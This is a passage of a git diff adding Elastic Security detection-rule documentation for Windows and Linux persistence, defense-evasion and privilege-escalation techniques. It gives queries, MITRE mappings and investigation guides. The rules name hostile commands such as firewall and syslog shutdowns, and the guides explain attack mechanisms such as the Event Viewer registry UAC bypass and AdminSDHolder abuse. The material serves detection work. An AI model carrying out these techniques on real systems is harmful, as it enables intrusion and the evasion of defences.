"computers_pwnotreqd", "trustdmp") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Remote System Discovery +** ID: T1018 +** Reference URL: https://attack.mitre.org/techniques/T1018/ +* Technique: +** Name: Permission Groups Discovery +** ID: T1069 +** Reference URL: https://attack.mitre.org/techniques/T1069/ +* Sub-technique: +** Name: Domain Groups +** ID: T1069.002 +** Reference URL: https://attack.mitre.org/techniques/T1069/002/ +* Technique: +** Name: Account Discovery +** ID: T1087 +** Reference URL: https://attack.mitre.org/techniques/T1087/ +* Sub-technique: +** Name: Domain Account +** ID: T1087.002 +** Reference URL: https://attack.mitre.org/techniques/T1087/002/ +* Technique: +** Name: Domain Trust Discovery +** ID: T1482 +** Reference URL: https://attack.mitre.org/techniques/T1482/ +* Technique: +** Name: System Network Configuration Discovery +** ID: T1016 +** Reference URL: https://attack.mitre.org/techniques/T1016/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adminsdholder-backdoor.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adminsdholder-backdoor.asciidoc new file mode 100644 index 0000000000..9147a48648 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adminsdholder-backdoor.asciidoc @@ -0,0 +1,74 @@ +[[prebuilt-rule-8-10-5-adminsdholder-backdoor]] +=== AdminSDHolder Backdoor + +Detects modifications in the AdminSDHolder object. Attackers can abuse the SDProp process to implement a persistent backdoor in Active Directory. SDProp compares the permissions on protected objects with those defined on the AdminSDHolder object. If the permissions on any of the protected accounts and groups do not match, the permissions on the protected accounts and groups are reset to match those of the domain's AdminSDHolder object, regaining their Administrative Privileges. + +*Rule type*: query + +*Rule indices*: + +* winlogbeat-* +* logs-system.* +* logs-windows.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://adsecurity.org/?p=1906 +* https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-c--protected-accounts-and-groups-in-active-directory#adminsdholder + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Use Case: Active Directory Monitoring +* Data Source: Active Directory + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +event.action:"Directory Service Changes" and event.code:5136 and + winlog.event_data.ObjectDN:CN=AdminSDHolder,CN=System* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Domain Accounts +** ID: T1078.002 +** Reference URL: https://attack.mitre.org/techniques/T1078/002/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adminsdholder-sdprop-exclusion-added.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adminsdholder-sdprop-exclusion-added.asciidoc new file mode 100644 index 0000000000..95bfeaa547 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adminsdholder-sdprop-exclusion-added.asciidoc @@ -0,0 +1,121 @@ +[[prebuilt-rule-8-10-5-adminsdholder-sdprop-exclusion-added]] +=== AdminSDHolder SDProp Exclusion Added + +Identifies a modification on the dsHeuristics attribute on the bit that holds the configuration of groups excluded from the SDProp process. The SDProp compares the permissions on protected objects with those defined on the AdminSDHolder object. If the permissions on any of the protected accounts and groups do not match, the permissions on the protected accounts and groups are reset to match those of the domain's AdminSDHolder object, meaning that groups excluded will remain unchanged. Attackers can abuse this misconfiguration to maintain long-term access to privileged accounts in these groups. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-system.* +* logs-windows.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.cert.ssi.gouv.fr/uploads/guide-ad.html#dsheuristics_bad +* https://petri.com/active-directory-security-understanding-adminsdholder-object + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Active Directory +* Resources: Investigation Guide +* Use Case: Active Directory Monitoring + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating AdminSDHolder SDProp Exclusion Added + +The SDProp process compares the permissions on protected objects with those defined on the AdminSDHolder object. If the permissions on any of the protected accounts and groups do not match, it resets the permissions on the protected accounts and groups to match those defined in the domain AdminSDHolder object. + +The dSHeuristics is a Unicode string attribute, in which each character in the string represents a heuristic that is used to determine the behavior of Active Directory. + +Administrators can use the dSHeuristics attribute to exclude privilege groups from the SDProp process by setting the 16th bit (dwAdminSDExMask) of the string to a certain value, which represents the group(s): + +- For example, to exclude the Account Operators group, an administrator would modify the string, so the 16th character is set to 1 (i.e., 0000000001000001). + +The usage of this exclusion can leave the accounts unprotected and facilitate the misconfiguration of privileges for the excluded groups, enabling attackers to add accounts to these groups to maintain long-term persistence with high privileges. + +This rule matches changes of the dsHeuristics object where the 16th bit is set to a value other than zero. + +#### Possible investigation steps + +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account and system owners and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Check the value assigned to the 16th bit of the string on the `winlog.event_data.AttributeValue` field: + - Account Operators eq 1 + - Server Operators eq 2 + - Print Operators eq 4 + - Backup Operators eq 8 + The field value can range from 0 to f (15). If more than one group is specified, the values will be summed together; for example, Backup Operators and Print Operators will set the `c` value on the bit. + +### False positive analysis + +- While this modification can be done legitimately, it is not a best practice. Any potential benign true positive (B-TP) should be mapped and reviewed by the security team for alternatives as this weakens the security of the privileged group. + +### Response and remediation + +- The change can be reverted by setting the dwAdminSDExMask (16th bit) to 0 in dSHeuristics. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +any where event.action == "Directory Service Changes" and + event.code == "5136" and + winlog.event_data.AttributeLDAPDisplayName : "dSHeuristics" and + length(winlog.event_data.AttributeValue) > 15 and + winlog.event_data.AttributeValue regex~ "[0-9]{15}([1-9a-f]).*" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Domain Accounts +** ID: T1078.002 +** Reference URL: https://attack.mitre.org/techniques/T1078/002/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adobe-hijack-persistence.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adobe-hijack-persistence.asciidoc new file mode 100644 index 0000000000..5e85be5f9c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adobe-hijack-persistence.asciidoc @@ -0,0 +1,132 @@ +[[prebuilt-rule-8-10-5-adobe-hijack-persistence]] +=== Adobe Hijack Persistence + +Detects writing executable files that will be automatically launched by Adobe on launch. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://twitter.com/pabraeken/status/997997818362155008 + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Adobe Hijack Persistence + +Attackers can replace the `RdrCEF.exe` executable with their own to maintain their access, which will be launched whenever Adobe Acrobat Reader is executed. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the file using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "windows" and event.type == "creation" and + file.path : ("?:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AcroCEF\\RdrCEF.exe", + "?:\\Program Files\\Adobe\\Acrobat Reader DC\\Reader\\AcroCEF\\RdrCEF.exe") and + not process.name : "msiexec.exe" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Sub-technique: +** Name: Services File Permissions Weakness +** ID: T1574.010 +** Reference URL: https://attack.mitre.org/techniques/T1574/010/ +* Technique: +** Name: Compromise Client Software Binary +** ID: T1554 +** Reference URL: https://attack.mitre.org/techniques/T1554/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-attempt-to-disable-iptables-or-firewall.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-attempt-to-disable-iptables-or-firewall.asciidoc new file mode 100644 index 0000000000..b929954640 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-attempt-to-disable-iptables-or-firewall.asciidoc @@ -0,0 +1,78 @@ +[[prebuilt-rule-8-10-5-attempt-to-disable-iptables-or-firewall]] +=== Attempt to Disable IPTables or Firewall + +Adversaries may attempt to disable the iptables or firewall service in an attempt to affect how a host is allowed to receive or send network traffic. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and + ( + /* disable FW */ + ( + (process.name == "ufw" and process.args == "disable") or + (process.name == "iptables" and process.args == "-F" and process.args_count == 2) + ) or + + /* stop FW service */ + ( + ((process.name == "service" and process.args == "stop") or + (process.name == "chkconfig" and process.args == "off") or + (process.name == "systemctl" and process.args in ("disable", "stop", "kill"))) and + process.args in ("firewalld", "ip6tables", "iptables") + ) + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-attempt-to-disable-syslog-service.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-attempt-to-disable-syslog-service.asciidoc new file mode 100644 index 0000000000..fcb36a80ea --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-attempt-to-disable-syslog-service.asciidoc @@ -0,0 +1,70 @@ +[[prebuilt-rule-8-10-5-attempt-to-disable-syslog-service]] +=== Attempt to Disable Syslog Service + +Adversaries may attempt to disable the syslog service in an attempt to an attempt to disrupt event logging and evade detection by security controls. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action in ("exec", "exec_event") and + ( (process.name == "service" and process.args == "stop") or + (process.name == "chkconfig" and process.args == "off") or + (process.name == "systemctl" and process.args in ("disable", "stop", "kill")) + ) and process.args in ("syslog", "rsyslog", "syslog-ng") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-base16-or-base32-encoding-decoding-activity.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-base16-or-base32-encoding-decoding-activity.asciidoc new file mode 100644 index 0000000000..9ea5746f47 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-base16-or-base32-encoding-decoding-activity.asciidoc @@ -0,0 +1,67 @@ +[[prebuilt-rule-8-10-5-base16-or-base32-encoding-decoding-activity]] +=== Base16 or Base32 Encoding/Decoding Activity + +Adversaries may encode/decode data in an attempt to evade detection by host- or network-based security controls. + +*Rule type*: query + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:linux and event.type:(start or process_started) and + process.name:(base16 or base32 or base32plain or base32hex) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Obfuscated Files or Information +** ID: T1027 +** Reference URL: https://attack.mitre.org/techniques/T1027/ +* Technique: +** Name: Deobfuscate/Decode Files or Information +** ID: T1140 +** Reference URL: https://attack.mitre.org/techniques/T1140/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-bash-shell-profile-modification.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-bash-shell-profile-modification.asciidoc new file mode 100644 index 0000000000..ae030529e3 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-bash-shell-profile-modification.asciidoc @@ -0,0 +1,80 @@ +[[prebuilt-rule-8-10-5-bash-shell-profile-modification]] +=== Bash Shell Profile Modification + +Both ~/.bash_profile and ~/.bashrc are files containing shell commands that are run when Bash is invoked. These files are executed in a user's context, either interactively or non-interactively, when a user logs in so that their environment is set correctly. Adversaries may abuse this to establish persistence by executing malicious content triggered by a user’s shell. + +*Rule type*: query + +*Rule indices*: + +* logs-endpoint.events.* +* auditbeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat + +*Tags*: + +* Domain: Endpoint +* OS: macOS +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Elastic Defend + +*Version*: 104 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:file and event.type:change and + process.name:(* and not (sudo or vim or zsh or env or nano or bash or Terminal or xpcproxy or login or cat or cp or + launchctl or java or dnf or tailwatchd or ldconfig or yum or semodule or cpanellogd or dockerd or authselect or chmod or + dnf-automatic or git or dpkg or platform-python)) and + not process.executable:(/Applications/* or /private/var/folders/* or /usr/local/* or /opt/saltstack/salt/bin/*) and + file.path:(/private/etc/rc.local or + /etc/rc.local or + /home/*/.profile or + /home/*/.profile1 or + /home/*/.bash_profile or + /home/*/.bash_profile1 or + /home/*/.bashrc or + /Users/*/.bash_profile or + /Users/*/.zshenv) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: Unix Shell Configuration Modification +** ID: T1546.004 +** Reference URL: https://attack.mitre.org/techniques/T1546/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-binary-executed-from-shared-memory-directory.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-binary-executed-from-shared-memory-directory.asciidoc new file mode 100644 index 0000000000..313f3eabb7 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-binary-executed-from-shared-memory-directory.asciidoc @@ -0,0 +1,69 @@ +[[prebuilt-rule-8-10-5-binary-executed-from-shared-memory-directory]] +=== Binary Executed from Shared Memory Directory + +Identifies the execution of a binary by root in Linux shared memory directories: (/dev/shm/, /run/shm/, /var/run/, /var/lock/). This activity is to be considered highly abnormal and should be investigated. Threat actors have placed executables used for persistence on high-uptime servers in these directories as system backdoors. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://linuxsecurity.com/features/fileless-malware-on-linux +* https://twitter.com/GossiTheDog/status/1522964028284411907 +* https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Threat: BPFDoor +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and event.action in ("exec", "exec_event") and +process.executable : ("/dev/shm/*", "/run/shm/*", "/var/run/*", "/var/lock/*") and +not process.executable : ("/var/run/docker/*", "/var/run/utsns/*", "/var/run/s6/*", "/var/run/cloudera-scm-agent/*") and +user.id == "0" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-bpf-filter-applied-using-tc.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-bpf-filter-applied-using-tc.asciidoc new file mode 100644 index 0000000000..6706969717 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-bpf-filter-applied-using-tc.asciidoc @@ -0,0 +1,69 @@ +[[prebuilt-rule-8-10-5-bpf-filter-applied-using-tc]] +=== BPF filter applied using TC + +Detects when the tc (transmission control) binary is utilized to set a BPF (Berkeley Packet Filter) on a network interface. Tc is used to configure Traffic Control in the Linux kernel. It can shape, schedule, police and drop traffic. A threat actor can utilize tc to set a bpf filter on an interface for the purpose of manipulating the incoming traffic. This technique is not at all common and should indicate abnormal, suspicious or malicious activity. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/h3xduck/TripleCross/blob/master/src/helpers/deployer.sh +* https://man7.org/linux/man-pages/man8/tc.8.html + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Threat: TripleCross +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type != "end" and process.executable : "/usr/sbin/tc" and process.args : "filter" and process.args : "add" and process.args : "bpf" and not process.parent.executable: "/usr/sbin/libvirtd" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-bypass-uac-via-event-viewer.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-bypass-uac-via-event-viewer.asciidoc new file mode 100644 index 0000000000..3bdb54c001 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-bypass-uac-via-event-viewer.asciidoc @@ -0,0 +1,147 @@ +[[prebuilt-rule-8-10-5-bypass-uac-via-event-viewer]] +=== Bypass UAC via Event Viewer + +Identifies User Account Control (UAC) bypass via eventvwr.exe. Attackers bypass UAC to stealthily execute code with elevated permissions. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Bypass UAC via Event Viewer + +Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted. + +For more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works). + +During startup, `eventvwr.exe` checks the registry value of the `HKCU\Software\Classes\mscfile\shell\open\command` registry key for the location of `mmc.exe`, which is used to open the `eventvwr.msc` saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. This rule detects this UAC bypass by monitoring processes spawned by `eventvwr.exe` other than `mmc.exe` and `werfault.exe`. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Inspect the host for suspicious or abnormal behavior in the alert timeframe. +- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the process executable using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, 